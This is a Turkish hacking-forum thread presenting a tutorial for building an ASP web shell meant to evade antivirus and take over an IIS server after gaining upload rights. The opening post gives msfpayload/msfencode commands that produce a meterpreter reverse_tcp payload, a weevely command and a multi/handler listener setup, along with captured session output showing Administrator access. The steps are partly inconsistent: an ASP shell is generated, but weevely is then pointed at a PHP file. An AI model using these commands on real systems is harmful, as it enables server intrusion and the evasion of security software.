İPUCU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

Asp Shell Encode Etmek

AntiPers - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2018
Mesajlar:
35
Konular:
3
Teşekkür (Etti):
11
Teşekkür (Aldı):
9
Ticaret:
(0) %
24-10-2018 18:14
#1
Asp Shell Encode Etmek
Selam dostlar bu konumda sizlere Antivirüsler Tarafınfan Yakalanamayan ASP Shell Oluşturulmayı göstericem (konu yerinden emin değilim)
Neyse konuya geçelim


Hedef Web Sunucuda (IIS-windows) eğer Dosya yükleme hakkı elde edersek , antivirüsler tarafından yakalanamayan asp shell dosyası kullanarak hedef web sunucuyu ele geçirebiliriz

Kod:
msfpayload windows/meterpreter/reverse_tcp LHOST=kali-sunucu-ipsi LPORT=443 R | msfencode -t raw -e x86/shikata_ga_nai -c3 | msfencode -t asp -o sh.asp
#msfpayload komutu ile antivirüsler tarafından yakalanamayan asp shell oluşturulur ve dosya yükleme hakkımız olan #web sunucuna yüklenir.


Kod:
weevely http://192.168.10.100/sh.php abc123
Oluşturduğumuz php shell dosyasını web sunucusuna attıktan sonra hedef web sunucusundan shell elde etmek için tekrar weevely komutunu kullanırız.


Kod:
root@kali:~# msfconsole msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
msf exploit(handler) > set LHOST 192.168.10.23 ((Kali sunucsunun İp'si) 
msf exploit(handler) > set LPORT 443 
msf exploit(handler) > exploit 
meterpreter > getuid Server username: alipc\Administrator meterpreter > sysinfo Computer : ALIPC OS : Windows 8 (Build 9200). Architecture : x64 (Current Process is WOW64) System Language : tr_TR Meterpreter : x86/win32 meterpreter >
#asp shell dosyası web sunucusuna yükledikten sonra dosya tarayıcı ile çalıştırılır.
#(http://hedef-web-sunuc-ip/sh.asp)
#Dosya Çalıştırıldıktan sonra Meterpreter Oturumu elde edilir.
---------------------
Ben Selin Gibi Şekerciyim
Konu AntiPers tarafından (24-10-2018 18:20 Saat 18:20 ) değiştirilmiştir.
hackerbbk - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2014
Mesajlar:
491
Konular:
101
Teşekkür (Etti):
29
Teşekkür (Aldı):
27
Ticaret:
(0) %
24-10-2018 19:21
#2
anlamadım normal shell basmadan farkı ne neden anti yakalayamasın ki ?
--------------------- #HAK YİYEN HACK YER#
AntiPers - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2018
Mesajlar:
35
Konular:
3
Teşekkür (Etti):
11
Teşekkür (Aldı):
9
Ticaret:
(0) %
26-10-2018 20:58
#3
Alıntı:
hackerbbk´isimli üyeden Alıntı Mesajı göster
anlamadım normal shell basmadan farkı ne neden anti yakalayamasın ki ?
#msfpayload komutu ile yakalanmamasını sağlıyoruz
---------------------
Ben Selin Gibi Şekerciyim

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı